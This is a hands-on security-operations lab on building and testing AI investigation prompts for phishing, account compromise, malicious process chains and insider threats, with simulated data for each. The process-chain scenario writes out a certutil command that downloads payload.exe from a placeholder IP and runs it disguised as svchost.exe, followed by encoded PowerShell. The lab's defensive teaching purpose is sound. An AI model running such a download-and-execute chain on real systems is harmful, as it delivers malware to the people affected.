Build Your Investigation Prompt Library

60-90 minutes Modules: Module 1, Module 2

Objective

Build a reusable prompt library with 4 investigation prompt templates from Module 2. Test each prompt with a realistic scenario, evaluate the output quality, and refine the prompts based on results.

Required: Access to Claude (claude.ai or API). No SIEM access needed — you will provide scenario data as context in your prompts.

Step 1: Create the phishing triage prompt

Build a prompt that analyses email header data and provides a triage assessment:

Template structure (from Module 2):

Role: You are a SOC analyst performing phishing email triage.
Context: [Paste email headers, URLs, sender information]
Task: Analyse this email and provide:
1. Sender legitimacy assessment (SPF/DKIM/DMARC results)
2. URL reputation analysis (domain age, hosting, redirection)
3. Content indicators (urgency language, impersonation, payload type)
4. Triage recommendation: Malicious / Suspicious / Legitimate
5. Recommended response actions
Constraints: Base your assessment only on the provided data. 
Flag any analysis that requires external verification.

Test scenario: Use the following simulated email header data:

From: security-team@m1crosoft-verify.com
Reply-To: support@m1crosoft-verify.com
Subject: Urgent: Your account has been compromised
SPF: fail (sender IP 185.234.xx.xx not in SPF record)
DKIM: none
DMARC: fail
URLs in body: hxxps://m1crosoft-verify[.]com/secure/login
Domain registration: 3 days ago via Namecheap

Run your prompt with this data. Evaluate the response:

Did it correctly identify the SPF/DKIM/DMARC failures?
Did it flag the domain age (3 days)?
Did it identify the typosquatting (m1crosoft)?
Did it provide a clear triage recommendation?
Did it suggest specific response actions?

Step 2: Create the account compromise scoping prompt

Build a prompt that takes sign-in log data and assesses compromise scope:

Template:

Role: You are a SOC analyst scoping a potential account compromise.
Context: The following sign-in events were recorded for [user] 
in the past 24 hours:
[Paste sign-in log entries with timestamps, IPs, locations, 
apps, MFA results]
Task: Analyse these sign-in events and determine:
1. Which sign-ins are from the user's normal pattern?
2. Which sign-ins are anomalous? Why?
3. What is the likely attack vector (AiTM, credential stuffing, 
   token replay)?
4. What data was potentially accessed based on the applications used?
5. Recommended containment actions in priority order
Constraints: Do not assume information not present in the data.

Test with sample data:

09:00 - 192.168.1.50 (UK) - Outlook - MFA: push approved
09:15 - 192.168.1.50 (UK) - SharePoint - SSO (no MFA)
14:22 - 198.51.100.77 (NL, DigitalOcean) - Outlook Web - 
        MFA: push approved (after 6 denials)
14:25 - 198.51.100.77 (NL) - SharePoint - SSO
14:28 - 198.51.100.77 (NL) - Exchange Admin - SSO
14:35 - 192.168.1.50 (UK) - Teams - SSO

Evaluate: Did the AI correctly identify the 14:22 anomaly? Did it flag the MFA fatigue? Did it note the adversary accessing Exchange Admin?

Step 3: Create the malware analysis prompt

Build a prompt for analysing process execution chains:

Template:

Role: You are a SOC analyst analysing a suspicious process chain 
from Defender for Endpoint.
Context: [Paste process tree: parent → child → grandchild with 
command lines, PIDs, timestamps, file paths]
Task: Analyse this process chain and determine:
1. Is this a legitimate process chain or potentially malicious?
2. What technique does this match (MITRE ATT&CK)?
3. What is the likely objective (download, execution, persistence, 
   lateral movement)?
4. What additional evidence should be collected?
5. Recommended response actions

Test with scenario:

winword.exe (PID 4521)
  └─ cmd.exe (PID 8834) /c certutil -urlcache -split -f 
     hxxp://198.51.100.22/payload.exe C:\Users\Public\svchost.exe
       └─ svchost.exe (PID 9012) from C:\Users\Public\
            └─ powershell.exe -enc [Base64 string]

Step 4: Create the insider threat assessment prompt

Build a prompt that analyses user activity patterns for insider threat indicators:

Template:

Role: You are a SOC analyst reviewing user activity for potential 
insider threat indicators.
Context: The user submitted their resignation on [date]. 
The following activity was recorded in the subsequent 14 days:
[Paste: file access logs, email activity, USB events, 
print events, cloud upload events]
Task: Assess this activity and determine:
1. Which activities are within normal work patterns?
2. Which activities are anomalous for this user or timing?
3. What data types were accessed (classify by sensitivity)?
4. Risk assessment: Low / Medium / High / Critical
5. Recommended actions (technical and HR/legal coordination)
Constraints: Maintain objectivity. Not all post-resignation 
activity is malicious. Flag indicators, do not assume guilt.

Step 5: Organise your prompt library

Create a structured document with your 4 tested prompts:

#	Prompt name	Incident type	Input required	Tested?
1	Phishing triage	Email analysis	Email headers + URLs	Yes
2	Account compromise scope	Identity compromise	Sign-in logs	Yes
3	Process chain analysis	Malware / endpoint	Process tree data	Yes
4	Insider threat assessment	Insider threat	Activity logs	Yes

Save this as your operational prompt library. You will expand it in Modules 3–5.

Verification checklist

4 prompt templates created with role/context/task/constraints structure
Each prompt tested with a realistic scenario
Output quality evaluated for each (accuracy, completeness, actionability)
Prompts refined based on test results
Library document created and saved

← All Labs